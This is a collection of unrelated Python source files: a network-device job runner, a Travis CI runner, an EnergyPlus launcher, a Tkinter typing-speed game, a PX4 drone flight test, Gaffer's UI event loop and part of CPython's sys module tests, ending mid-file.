"-i", "--inventory", help="The inventory file to load.", required=True
)
parser.add_argument(
"-j",
"--jobfile",
help="The file containing commands to send to the NOS",
required=True,
)
parser.add_argument(
"-t", "--threads", help="The number of devices to connect to at once."
)
parser.add_argument(
"--debug-netmiko",
help="Advanced debuging, logs netmiko internals to a file",
action="store_true",
)
parser.add_argument(
"--no-preload",
help="Disable caching for config files.",
action="store_true",
)
output_config = parser.add_mutually_exclusive_group(required=False)
output_config.add_argument(
"-q", "--quiet", help="Suppress most output", action="store_true"
)
output_config.add_argument(
"-v", "--verbose", help="Enable verbose output", action="store_true"
)
return parser.parse_args()
def main():
"""The entry point for interactive use (the only supported use as of now)
1) Collect command line arguments
2) Configure itself from parsed command line args
3) Read configuration files given
4) Creates output directories
5) Create and start process pool
6) Spinlock until process pool completes or Ctrl-C is received
7) Cleanup and exit.
"""
args = handle_arguments()
start = dtime.datetime.now()
log_level = logging.WARNING
if args.quiet:
log_level = logging.CRITICAL
if args.verbose:
log_level = logging.DEBUG
manager = mp.Manager()
log_q = manager.Queue()
logging_process = mp.Process(target=mctlogger.helper, args=(log_q, log_level))
logging_process.start()
log_q.put("warning Copyright Andrew Piroli 2019-2020")
log_q.put("warning MIT License")
log_q.put("warning ")
selected_mode = OperatingModes.YeetMode if args.yeet else OperatingModes.YoinkMode
log_q.put(f"warning Running in operating mode: {selected_mode}")
try:
NUM_THREADS = int(args.threads) if args.threads else NUM_THREADS_DEFAULT
if NUM_THREADS < 1:
raise RuntimeError(
f"User input: {NUM_THREADS} - below 1, can not create less than 1 processes."
)
except (ValueError, RuntimeError) as err:
log_q.put(
f"critical NUM_THREADS out of range: setting to default value of {NUM_THREADS_DEFAULT}"
)
log_q.put(f"debug {repr(err)}")
NUM_THREADS = NUM_THREADS_DEFAULT
args.inventory = abspath(args.inventory)
config = read_config(abspath(args.inventory), log_q)
args.jobfile = abspath(args.jobfile)
set_dir("Output", log_q)
set_dir(dtime.datetime.now().strftime("%Y-%m-%d %H.%M"), log_q)
netmiko_debug_file = abspath(".") / "netmiko." if args.debug_netmiko else None
preloaded_jobfile = (
preload_jobfile(args.jobfile, log_q) if not args.no_preload else None
)
p_config = {
"mode": selected_mode,
"log_queue": log_q,
"netmiko_debug": netmiko_debug_file,
"jobfile": args.jobfile,
"jobfile_cache": preloaded_jobfile,
}
# Stackoverflow https://stackoverflow.com/a/63495323
# CC-BY-SA 4.0
# By: geitda https://stackoverflow.com/users/14133684/geitda
# Hopefully this improves Ctrl-C performance....
with ProcessPoolExecutor(max_workers=NUM_THREADS) as ex:
futures = [ex.submit(run, creds, p_config) for creds in config]
done, not_done = wait(futures, timeout=0)
try:
while not_done:
freshly_done, not_done = wait(not_done, timeout=0.5)
done |= freshly_done
except KeyboardInterrupt:
for future in not_done:
_ = future.cancel()
log_q.put(
"critical Jobs cancelled, please wait for remaining jobs to finish."
)
_ = wait(not_done, timeout=None)
# End Stackoverflow code
os.chdir("..")
os.chdir("..")
end = dtime.datetime.now()
elapsed = (end - start).total_seconds()
log_q.put(f"warning Time Elapsed: {elapsed}")
log_q.put(THREAD_KILL_MSG)
logging_process.join()
if __name__ == "__main__":
main()
|
run_travis.py
|
import subprocess
import threading
import yaml
from typing import Any, Dict, Iterable, Union
returncodes = {}
def execute_script(script_or_scripts: Union[str, Iterable[str]]):
if isinstance(script_or_scripts, str):
process = subprocess.run(script_or_scripts.split())
return process.returncode
elif isinstance(script_or_scripts, Iterable):
for script in script_or_scripts:
returncode = execute_script(script)
if returncode != 0:
return returncode
return 0
else:
raise ValueError(f"`script_or_scripts` must be a string or iterable of strings, not '{type(script_or_scripts)}'")
def execute_job(job: Dict[str, Any]):
returncodes[job["name"]] = execute_script(job["script"])
if __name__ == "__main__":
config = yaml.safe_load(open(".travis.yml"))
threads = [
threading.Thread(target=execute_job, args=(job, ))
for job in config["jobs"]["include"]
]
[thread.start() for thread in threads]
[thread.join() for thread in threads]
[print(job["name"], returncodes[job["name"]]) for job in config["jobs"]["include"]]
|
main.py
|
# This is a sample Python script.
# Press ⌃R to execute it or replace it with your code.
# Press Double ⇧ to search everywhere for classes, files, tool windows, actions, and settings.
from util.eplus_model_interface import EplusModelIndexedList
import os
import multiprocessing as mp
FILE_DIR = os.path.dirname(__file__)
from pathlib import Path
def run(eplus_wea: str, eplus_file: str):
"""run energyplus"""
path = Path(eplus_file)
parent_dir = path.parent.absolute()
os.chdir(parent_dir)
os.system("energyplus -w %s -r %s" % (eplus_wea, eplus_file))
# Press the green button in the gutter to run the script.
if __name__ == '__main__':
wea_dir = os.path.join(FILE_DIR, "eplus_files/weather/chicago_tmy3.epw")
models = [os.path.join(FILE_DIR, "eplus_files/bldg1/PythonPluginCustomSchedule1.idf"),
os.path.join(FILE_DIR, "eplus_files/bldg2/PythonPluginCustomSchedule2.idf"),
os.path.join(FILE_DIR, "eplus_files/bldg3/PythonPluginCustomSchedule3.idf")]
# Setup a list of processes that we want to run
processes = [mp.Process(target=run, args=(wea_dir, x)) for x in models]
# Run processes
for p in processes:
p.start()
# See PyCharm help at https://www.jetbrains.com/help/pycharm/
|
clear_app.py
|
import asyncio
import threading
from tkinter import messagebox, Entry
import tkinter as tk
import tkinter.font as font
import tkinter.scrolledtext as scrolledtext
async def start_timer(label_filename, txt_edit):
""" async функция которая выполниться асинхронно в отдельном процессе """
txt_edit.focus_set() # фокус на текстовое поле, чтобы человек мог сразу печатать
txt_edit.configure(state='normal') # активировать текстовое поле
# цикл отсчитывает кол-во секунд, через которые закончиться испытание
for i in range(0, 120):
label_filename.config(text=i, font=("Calibri", 50)) # отображение таймера и его стили
await asyncio.sleep(1.0) # спать 1 секунду
result_text = txt_edit.get(1.0, tk.END) # получаем результирующий напечатанный текст
# print("You typed: ", result_text)
# print("Symbols: ", len(result_text))
txt_edit.delete(1.0, tk.END) # Очищаю напечатанный текст в txt_edit
label_filename.config(text='') # Очищаю текст метки (таймера), после того как время выйдет
messagebox.showinfo(message='Время вышло! Ты завершил испытание!')
result_text = len(result_text.replace(" ", "")) - 1
messagebox.showinfo(message='Ты напечатал {} знаков за 120 секунд'.format(result_text))
def _asyncio_thread(async_loop, label_filename, txt_edit):
""" Асинхронный поток """
async_loop.run_until_complete(start_timer(label_filename, txt_edit))
def do_tasks(async_loop, label_filename, txt_edit):
""" Button-Event-Handler starting the asyncio part. """
# https://devpractice.ru/python-lesson-22-concurrency-part-1/ TODO прочитать и разобраться с is_alive()
threading.Thread(target=_asyncio_thread, args=(async_loop, label_filename, txt_edit)).start()
def save_current_file(event=False):
messagebox.showinfo(message='Файл сохранен (фейк)')
def run_by_hot_key(async_loop, label_filename, txt_edit, event=None):
return do_tasks(async_loop, label_filename, txt_edit)
def main(async_loop):
window = tk.Tk()
window.title("StarTyping - Конкурс по скорости печати")
window.geometry("750x450")
window.rowconfigure(0, minsize=500, weight=1)
window.columnconfigure(1, minsize=500, weight=1)
# implementing scrollbar functionality
scrollbar = tk.Scrollbar(window)
# add scrolledtext and ctrl + Z functionality
txt_edit = scrolledtext.ScrolledText(window, undo=True, wrap=tk.WORD, width=40, state='disabled', height=10, )
fr_buttons = tk.Frame(window, relief=tk.RAISED, bd=2)
btn_do_tasks = tk.Button(fr_buttons, text="Начать", command=lambda: do_tasks(async_loop, label_filename, txt_edit))
# Создаем метки
label_filename = tk.Label(fr_buttons, text='')
# Прикручиваем эти кнопки к дизайну
btn_do_tasks.grid(row=3, column=0, sticky="ew", padx=5, pady=5)
# Настраиваем отображение основных елементов
label_filename.grid(row=7, column=0, sticky="nsew", padx=5, pady=40)
fr_buttons.grid(row=0, column=0, sticky="ns")
txt_edit.grid(row=0, column=1, sticky="nsew", padx=20, pady=20)
# define font
myFont = font.Font(family='Helvetica', size=25)
txt_edit['font'] = myFont # установил шрифт и размеры для текстового поля
# Создаем слушатель комбинации клавиш для старта процесса. TODO комбинация работает только на русской раскладке
# передаю локальные переменные интерфейса, включая параметр event от метода .bind()
window.bind('<Control-s>', lambda event: run_by_hot_key(async_loop, label_filename, txt_edit))
# entry = Entry(window, width=30)
# entry.grid(row=3, column=0, sticky="ew", padx=5, pady=5)
window.mainloop()
if __name__ == '__main__':
async_loop = asyncio.new_event_loop() # Запускаю асинхронный цикл событий
asyncio.set_event_loop(async_loop) # Устанавливаю его как "основной асинхронный цикл"
main(async_loop) # Запуск основного цикла программы и передаю аргументом асинхронный цикл
|
mavros_offboard_posctl_test.py
|
#!/usr/bin/env python2
#***************************************************************************
#
# Copyright (c) 2015 PX4 Development Team. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# 3. Neither the name PX4 nor the names of its contributors may be
# used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
# OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
# AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
#***************************************************************************/
#
# @author Andreas Antener <andreas@uaventure.com>
#
# The shebang of this file is currently Python2 because some
# dependencies such as pymavlink don't play well with Python3 yet.
from __future__ import division
PKG = 'px4'
import rospy
import math
import numpy as np
from geometry_msgs.msg import PoseStamped, Quaternion
from mavros_test_common import MavrosTestCommon
from pymavlink import mavutil
from six.moves import xrange
from std_msgs.msg import Header
from threading import Thread
from tf.transformations import quaternion_from_euler
class MavrosOffboardPosctlTest(MavrosTestCommon):
"""
Tests flying a path in offboard control by sending position setpoints
via MAVROS.
For the test to be successful it needs to reach all setpoints in a certain time.
FIXME: add flight path assertion (needs transformation from ROS frame to NED)
"""
def setUp(self):
super(MavrosOffboardPosctlTest, self).setUp()
self.pos = PoseStamped()
self.radius = 1
self.pos_setpoint_pub = rospy.Publisher(
'mavros/setpoint_position/local', PoseStamped, queue_size=1)
# send setpoints in seperate thread to better prevent failsafe
self.pos_thread = Thread(target=self.send_pos, args=())
self.pos_thread.daemon = True
self.pos_thread.start()
def tearDown(self):
super(MavrosOffboardPosctlTest, self).tearDown()
#
# Helper methods
#
def send_pos(self):
rate = rospy.Rate(10) # Hz
self.pos.header = Header()
self.pos.header.frame_id = "base_footprint"
while not rospy.is_shutdown():
self.pos.header.stamp = rospy.Time.now()
self.pos_setpoint_pub.publish(self.pos)
try: # prevent garbage in console output when thread is killed
rate.sleep()
except rospy.ROSInterruptException:
pass
def is_at_position(self, x, y, z, offset):
"""offset: meters"""
rospy.logdebug(
"current position | x:{0:.2f}, y:{1:.2f}, z:{2:.2f}".format(
self.local_position.pose.position.x, self.local_position.pose.
position.y, self.local_position.pose.position.z))
desired = np.array((x, y, z))
pos = np.array((self.local_position.pose.position.x,
self.local_position.pose.position.y,
self.local_position.pose.position.z))
return np.linalg.norm(desired - pos) < offset
def reach_position(self, x, y, z, timeout):
"""timeout(int): seconds"""
# set a position setpoint
self.pos.pose.position.x = x
self.pos.pose.position.y = y
self.pos.pose.position.z = z
rospy.loginfo(
"attempting to reach position | x: {0}, y: {1}, z: {2} | current position x: {3:.2f}, y: {4:.2f}, z: {5:.2f}".
format(x, y, z, self.local_position.pose.position.x,
self.local_position.pose.position.y,
self.local_position.pose.position.z))
# For demo purposes we will lock yaw/heading to north.
yaw_degrees = 20 # North
yaw = math.radians(yaw_degrees)
quaternion = quaternion_from_euler(0, 0, yaw)
self.pos.pose.orientation = Quaternion(*quaternion)
# does it reach the position in 'timeout' seconds?
loop_freq = 5 # Hz
rate = rospy.Rate(loop_freq)
reached = False
for i in xrange(timeout * loop_freq):
if self.is_at_position(self.pos.pose.position.x,
self.pos.pose.position.y,
self.pos.pose.position.z, self.radius):
rospy.loginfo("position reached | seconds: {0} of {1}".format(
i / loop_freq, timeout))
reached = True
break
try:
rate.sleep()
except rospy.ROSException as e:
self.fail(e)
self.assertTrue(reached, (
"took too long to get to position | current position x: {0:.2f}, y: {1:.2f}, z: {2:.2f} | timeout(seconds): {3}".
format(self.local_position.pose.position.x,
self.local_position.pose.position.y,
self.local_position.pose.position.z, timeout)))
#
# Test method
#
def test_posctl(self):
"""Test offboard position control"""
# make sure the simulation is ready to start the mission
self.wait_for_topics(60)
# self.wait_for_landed_state(mavutil.mavlink.MAV_LANDED_STATE_ON_GROUND,
# 10, -1)
self.log_topic_vars()
self.set_mode("OFFBOARD", 5)
self.set_arm(True, 5)
rospy.loginfo("run mission")
positions = ((0, 0, 0), (5, 0, 5), (5, 1, 5), (5, 0, 5),
(0, 0, 5))
for i in xrange(len(positions)):
self.reach_position(positions[i][0], positions[i][1],
positions[i][2], 30)
# self.set_mode("AUTO.LAND", 5)
# self.wait_for_landed_state(mavutil.mavlink.MAV_LANDED_STATE_ON_GROUND,
# 45, 0)
# self.set_arm(False, 5)
self.set_mode("OFFBOARD", 15)
self.set_arm(True, 15)
if __name__ == '__main__':
import rostest
rospy.init_node('test_node', anonymous=True)
rostest.rosrun(PKG, 'mavros_offboard_posctl_test',
MavrosOffboardPosctlTest)
|
EventLoop.py
|
##########################################################################
#
# Copyright (c) 2011-2012, John Haddon. All rights reserved.
# Copyright (c) 2011-2015, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import time
import weakref
import threading
import traceback
import functools
import IECore
import Gaffer
import GafferUI
from Qt import QtCore
from Qt import QtWidgets
## This class provides the event loops used to run GafferUI based applications.
class EventLoop( object ) :
__RunStyle = IECore.Enum.create( "Normal", "PumpThread", "AlreadyRunning", "Houdini" )
## Creates a new EventLoop. Note that if you are creating the primary
# EventLoop for an application then you should use mainEventLoop() instead.
def __init__( self, __qtEventLoop=None ) :
if __qtEventLoop is None :
if self.__mainEventLoop is None or self.__mainEventLoop.__startCount==0 :
raise Exception( "Main event loop is not running - perhaps you should use EventLoop.mainEventLoop()?" )
self.__qtEventLoop = QtCore.QEventLoop()
else :
self.__qtEventLoop = __qtEventLoop
self.__runStyle = self.__RunStyle.Normal
if isinstance( self.__qtEventLoop, QtWidgets.QApplication ) :
try :
import maya.OpenMaya
if maya.OpenMaya.MGlobal.apiVersion() < 201100 :
self.__runStyle = self.__RunStyle.PumpThread
else :
self.__runStyle = self.__RunStyle.AlreadyRunning
except ImportError :
pass
try :
import hou
if hou.applicationVersion()[0] < 14 :
self.__runStyle = self.__RunStyle.Houdini
else :
self.__runStyle = self.__RunStyle.AlreadyRunning
except ImportError :
pass
try :
import nuke
self.__runStyle = self.__RunStyle.AlreadyRunning
except ImportError :
pass
self.__startCount = 0
self.__pumpThread = None
self.__houdiniCallback = None
## Starts the event loop, passing control to the UI code. This function returns
# when the corresponding stop() method is called. See documentation for
# mainEventLoop() for exceptions to this rule.
def start( self ) :
self.__startCount += 1
if self.__runStyle == self.__RunStyle.Normal :
assert( self.__startCount == 1 )
self.__qtEventLoop.exec_()
elif self.__runStyle == self.__RunStyle.PumpThread :
if self.__pumpThread is None :
self.__pumpThread = threading.Thread( target = self.__pumpThreadFn )
self.__pumpThread.start()
elif self.__runStyle == self.__RunStyle.Houdini :
if self.__houdiniCallback is None :
import hou
hou.ui.addEventLoopCallback( functools.partial( self.__pump, 5 ) )
self.__houdiniCallback = hou.ui.eventLoopCallbacks()[-1]
else :
# RunStyle.AlreadyRunning
# host application is using qt natively, no need to do anything.
pass
## Stops the event loop last started using start().
def stop( self ) :
assert( self.__startCount > 0 )
if self.__runStyle == self.__RunStyle.Normal :
assert( self.__startCount == 1 )
self.__qtEventLoop.exit()
elif self.__runStyle == self.__RunStyle.PumpThread :
## \todo Should we try to stop the pump thread
# when self.__startCount hits 0? Right not we're
# just keeping it running on the assumption we'll
# need it again soon.
pass
elif self.__runStyle == self.__RunStyle.Houdini :
if self.__startCount == 1 and self.__houdiniCallback :
import hou
hou.ui.removeEventLoopCallback( self.__houdiniCallback )
self.__houdiniCallback = None
else :
# RunStyle.AlreadyRunning
pass
self.__startCount -= 1
## Returns true if this event loop is currently running.
def running( self ) :
return self.__startCount > 0
# if we're running embedded in an application which already uses qt (like maya 2011 or later)
# then there'll already be an application, which we'll share. if not we'll make our own.
if QtWidgets.QApplication.instance() :
__qtApplication = QtWidgets.QApplication.instance()
else :
# set the style explicitly so we don't inherit one from the desktop
# environment, which could mess with our own style (on gnome for instance,
# our icons can come out the wrong size).
QtWidgets.QApplication.setStyle( "plastique" )
__qtApplication = QtWidgets.QApplication( [ "gaffer" ] )
__mainEventLoop = None
## Returns the main event loop for the application. This should always
# be started before running any other nested event loops. In the standalone
# Gaffer applications, the main event loop acts like any other, but when
# GafferUI is embedded in another application (like Maya) it behaves slightly
# differently. In this case, the start() method returns immediately so that
# the GafferUI event loop may be interleaved with the event loop of the host
# application. Additionally, the start() method may also be called multiple
# times to allow several GafferUI-based applications to run in the same host.
# The main event loop will therefore only cease running when the number of
# calls to stop() matches the number of calls to start().
@classmethod
def mainEventLoop( cls ) :
if cls.__mainEventLoop is None :
cls.__mainEventLoop = cls( cls.__qtApplication )
return cls.__mainEventLoop
__idleCallbacks = []
__idleTimer = None
## Adds a function to be called when the event loop is idle (has no events
# remaining to be processed). If callback returns False then it will be removed
# automatically after running, if it returns True it will be called again until
# it returns False, or until removeIdleCallback() is called.
## \todo This should probably be replaced with an idleSignal() like the one we
# have in GafferUI.Gadget.
@classmethod
def addIdleCallback( cls, callback ) :
assert( callback not in cls.__idleCallbacks )
cls.__idleCallbacks.append( callback )
cls.__ensureIdleTimer()
## Removes an idle callback previously created with addIdleCallback().
@classmethod
def removeIdleCallback( cls, callback ) :
cls.__idleCallbacks.remove( callback )
## Convenience method to introduce a delay on the mainEventLoop().
@classmethod
def waitForIdle( cls, count = 1000 ) :
cls.__idleCount = 0
def f() :
cls.__idleCount += 1
if cls.__idleCount >= count :
EventLoop.mainEventLoop().stop()
return False
return True
EventLoop.addIdleCallback( f )
EventLoop.mainEventLoop().start()
## Widgets may only be manipulated on the thread where mainEventLoop() is running. It
# is common to want to perform some background processing on a secondary thread, and
# to update the UI during processing or upon completion. This function can be used from
# such a secondary thread to queue a callable to be called on the main thread. If called
# from the main thread, the callable is called immediately.
@classmethod
def executeOnUIThread( cls, callable, waitForResult=False ) :
if QtCore.QThread.currentThread() == cls.__qtApplication.thread() :
# Already on the UI thread - just do it.
return callable()
resultCondition = threading.Condition() if waitForResult else None
# we only use a weakref here, because we don't want to be keeping the object
# alive from this thread, and hence deleting it from this thread. instead it
# is deleted in _UIThreadExecutor.event().
uiThreadExecutor = weakref.ref( _UIThreadExecutor( callable, resultCondition ) )
uiThreadExecutor().moveToThread( cls.__qtApplication.thread() )
if resultCondition is not None :
resultCondition.acquire()
cls.__qtApplication.postEvent( uiThreadExecutor(), QtCore.QEvent( QtCore.QEvent.Type( _UIThreadExecutor.executeEventType ) ) )
resultCondition.wait()
resultCondition.release()
return resultCondition.resultValue
else :
cls.__qtApplication.postEvent( uiThreadExecutor(), QtCore.QEvent( QtCore.QEvent.Type( _UIThreadExecutor.executeEventType ) ) )
return None
@classmethod
def __ensureIdleTimer( cls ) :
assert( QtCore.QThread.currentThread() == EventLoop.__qtApplication.thread() )
if cls.__idleTimer is None :
cls.__idleTimer = QtCore.QTimer( cls.__qtApplication )
cls.__idleTimer.timeout.connect( cls.__qtIdleCallback )
if not cls.__idleTimer.isActive() :
cls.__idleTimer.start()
# This is a staticmethod rather than a classmethod because PySide 1.0.5
# doesn't support classmethods as slots.
@staticmethod
def __qtIdleCallback() :
assert( QtCore.QThread.currentThread() == EventLoop.__qtApplication.thread() )
GafferUI.Gadget.idleSignal()()
for c in EventLoop.__idleCallbacks[:] : # slice takes copy, so we can remove during iteration
try :
if not c() :
EventLoop.__idleCallbacks.remove( c )
except Exception, e :
# if the callback throws then we remove it anyway, because
# we don't want to keep invoking the same error over and over.
EventLoop.__idleCallbacks.remove( c )
# report the error
IECore.msg( IECore.Msg.Level.Error, "EventLoop.__qtIdleCallback", "".join( traceback.format_exc( e ) ) )
if len( EventLoop.__idleCallbacks )==0 and GafferUI.Gadget.idleSignal().empty() :
EventLoop.__idleTimer.stop()
@classmethod
def _gadgetIdleSignalAccessed( cls ) :
# It would be an error to access the idle signal from anything but the main
# thread, because it would imply multiple threads fighting over the same signal.
assert( QtCore.QThread.currentThread() == EventLoop.__qtApplication.thread() )
cls.__ensureIdleTimer()
def __pumpThreadFn( self ) :
import maya.utils
while 1 :
time.sleep( 0.01 )
maya.utils.executeDeferred( self.__pump )
def __pump( self, thrusts=1 ) :
for thrust in range( 0, thrusts ) :
self.__qtEventLoop.processEvents()
_gadgetIdleSignalAccessedConnection = GafferUI.Gadget._idleSignalAccessedSignal().connect( EventLoop._gadgetIdleSignalAccessed )
class _UIThreadExecutor( QtCore.QObject ) :
executeEventType = QtCore.QEvent.registerEventType()
__instances = set()
def __init__( self, callable, resultCondition = None ) :
QtCore.QObject.__init__( self )
self.__callable = callable
self.__resultCondition = resultCondition
# we store a reference to ourselves in __instances, as otherwise
# we go out of scope and get deleted at the end of executeOnUIThread
# above. that's bad because we never live long enough to get our event,
# and we'll also be being deleted from the calling thread, not the ui
# thread where we live.
self.__instances.add( self )
def event( self, event ) :
if event.type() == self.executeEventType :
result = self.__callable()
if self.__resultCondition is not None :
self.__resultCondition.acquire()
self.__resultCondition.resultValue = result
self.__resultCondition.notify()
self.__resultCondition.release()
self.__instances.remove( self )
return True
return False
# Service the requests made to `ParallelAlgo::callOnUIThread()`.
Gaffer.ParallelAlgo.callOnUIThreadSignal().connect( EventLoop.executeOnUIThread, scoped = False )
|
test_sys.py
|
import unittest, test.support
from test.support.script_helper import assert_python_ok, assert_python_failure
import sys, io, os
import struct
import subprocess
import textwrap
import warnings
import operator
import codecs
import gc
import sysconfig
import locale
# count the number of test runs, used to create unique
# strings to intern in test_intern()
numruns = 0
try:
import threading
except ImportError:
threading = None
class SysModuleTest(unittest.TestCase):
def setUp(self):
self.orig_stdout = sys.stdout
self.orig_stderr = sys.stderr
self.orig_displayhook = sys.displayhook
def tearDown(self):
sys.stdout = self.orig_stdout
sys.stderr = self.orig_stderr
sys.displayhook = self.orig_displayhook
test.support.reap_children()
def test_original_displayhook(self):
import builtins
out = io.StringIO()
sys.stdout = out
dh = sys.__displayhook__
self.assertRaises(TypeError, dh)
if hasattr(builtins, "_"):
del builtins._
dh(None)
self.assertEqual(out.getvalue(), "")
self.assertTrue(not hasattr(builtins, "_"))
dh(42)
self.assertEqual(out.getvalue(), "42\n")
self.assertEqual(builtins._, 42)
del sys.stdout
self.assertRaises(RuntimeError, dh, 42)
def test_lost_displayhook(self):
del sys.displayhook
code = compile("42", "<string>", "single")
self.assertRaises(RuntimeError, eval, code)
def test_custom_displayhook(self):
def baddisplayhook(obj):
raise ValueError
sys.displayhook = baddisplayhook
code = compile("42", "<string>", "single")
self.assertRaises(ValueError, eval, code)
def test_original_excepthook(self):
err = io.StringIO()
sys.stderr = err
eh = sys.__excepthook__
self.assertRaises(TypeError, eh)
try:
raise ValueError(42)
except ValueError as exc:
eh(*sys.exc_info())
self.assertTrue(err.getvalue().endswith("ValueError: 42\n"))
def test_excepthook(self):
with test.support.captured_output("stderr") as stderr:
sys.excepthook(1, '1', 1)
self.assertTrue("TypeError: print_exception(): Exception expected for " \
"value, str found" in stderr.getvalue())
# FIXME: testing the code for a lost or replaced excepthook in
# Python/pythonrun.c::PyErr_PrintEx() is tricky.
def test_exit(self):
# call with two arguments
self.assertRaises(TypeError, sys.exit, 42, 42)
# call without argument
with self.assertRaises(SystemExit) as cm:
sys.exit()
self.assertIsNone(cm.exception.code)
rc, out, err = assert_python_ok('-c', 'import sys; sys.exit()')
self.assertEqual(rc, 0)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
# call with integer argument
with self.assertRaises(SystemExit) as cm:
sys.exit(42)
self.assertEqual(cm.exception.code, 42)
# call with tuple argument with one entry
# entry will be unpacked
with self.assertRaises(SystemExit) as cm:
sys.exit((42,))
self.assertEqual(cm.exception.code, 42)
# call with string argument
with self.assertRaises(SystemExit) as cm:
sys.exit("exit")
self.assertEqual(cm.exception.code, "exit")
# call with tuple argument with two entries
with self.assertRaises(SystemExit) as cm:
sys.exit((17, 23))
self.assertEqual(cm.exception.code, (17, 23))
# test that the exit machinery handles SystemExits properly
rc, out, err = assert_python_failure('-c', 'raise SystemExit(47)')
self.assertEqual(rc, 47)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
def check_exit_message(code, expected, **env_vars):
rc, out, err = assert_python_failure('-c', code, **env_vars)
self.assertEqual(rc, 1)
self.assertEqual(out, b'')
self.assertTrue(err.startswith(expected),
"%s doesn't start with %s" % (ascii(err), ascii(expected)))
# test that stderr buffer is flushed before the exit message is written
# into stderr
check_exit_message(
r'import sys; sys.stderr.write("unflushed,"); sys.exit("message")',
b"unflushed,message")
# test that the exit message is written with backslashreplace error
# handler to stderr
check_exit_message(
r'import sys; sys.exit("surrogates:\uDCFF")',
b"surrogates:\\udcff")
# test that the unicode message is encoded to the stderr encoding
# instead of the default encoding (utf8)
check_exit_message(
r'import sys; sys.exit("h\xe9")',
b"h\xe9", PYTHONIOENCODING='latin-1')
def test_getdefaultencoding(self):
self.assertRaises(TypeError, sys.getdefaultencoding, 42)
# can't check more than the type, as the user might have changed it
self.assertIsInstance(sys.getdefaultencoding(), str)
# testing sys.settrace() is done in test_sys_settrace.py
# testing sys.setprofile() is done in test_sys_setprofile.py
def test_setcheckinterval(self):
with warnings.catch_warnings():
warnings.simplefilter("ignore")
self.assertRaises(TypeError, sys.setcheckinterval)
orig = sys.getcheckinterval()
for n in 0, 100, 120, orig: # orig last to restore starting state
sys.setcheckinterval(n)
self.assertEqual(sys.getcheckinterval(), n)
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_switchinterval(self):
self.assertRaises(TypeError, sys.setswitchinterval)
self.assertRaises(TypeError, sys.setswitchinterval, "a")
self.assertRaises(ValueError, sys.setswitchinterval, -1.0)
self.assertRaises(ValueError, sys.setswitchinterval, 0.0)
orig = sys.getswitchinterval()
# sanity check
self.assertTrue(orig < 0.5, orig)
try:
for n in 0.00001, 0.05, 3.0, orig:
sys.setswitchinterval(n)
self.assertAlmostEqual(sys.getswitchinterval(), n)
finally:
sys.setswitchinterval(orig)
def test_recursionlimit(self):
self.assertRaises(TypeError, sys.getrecursionlimit, 42)
oldlimit = sys.getrecursionlimit()
self.assertRaises(TypeError, sys.setrecursionlimit)
self.assertRaises(ValueError, sys.setrecursionlimit, -42)
sys.setrecursionlimit(10000)
self.assertEqual(sys.getrecursionlimit(), 10000)
sys.setrecursionlimit(oldlimit)
def test_recursionlimit_recovery(self):
if hasattr(sys, 'gettrace') and sys.gettrace():
self.skipTest('fatal error if run with a trace function')
oldlimit = sys.getrecursionlimit()
def f():
f()
try:
for depth in (10, 25, 50, 75, 100, 250, 1000):
try:
sys.setrecursionlimit(depth)
except RecursionError:
# Issue #25274: The recursion limit is too low at the
# current recursion depth
continue
# Issue #5392: test stack overflow after hitting recursion
# limit twice
self.assertRaises(RecursionError, f)
self.assertRaises(RecursionError, f)
finally:
sys.setrecursionlimit(oldlimit)
@test.support.cpython_only
def test_setrecursionlimit_recursion_depth(self):
# Issue #25274: Setting a low recursion limit must be blocked if the
# current recursion depth is already higher than the "lower-water
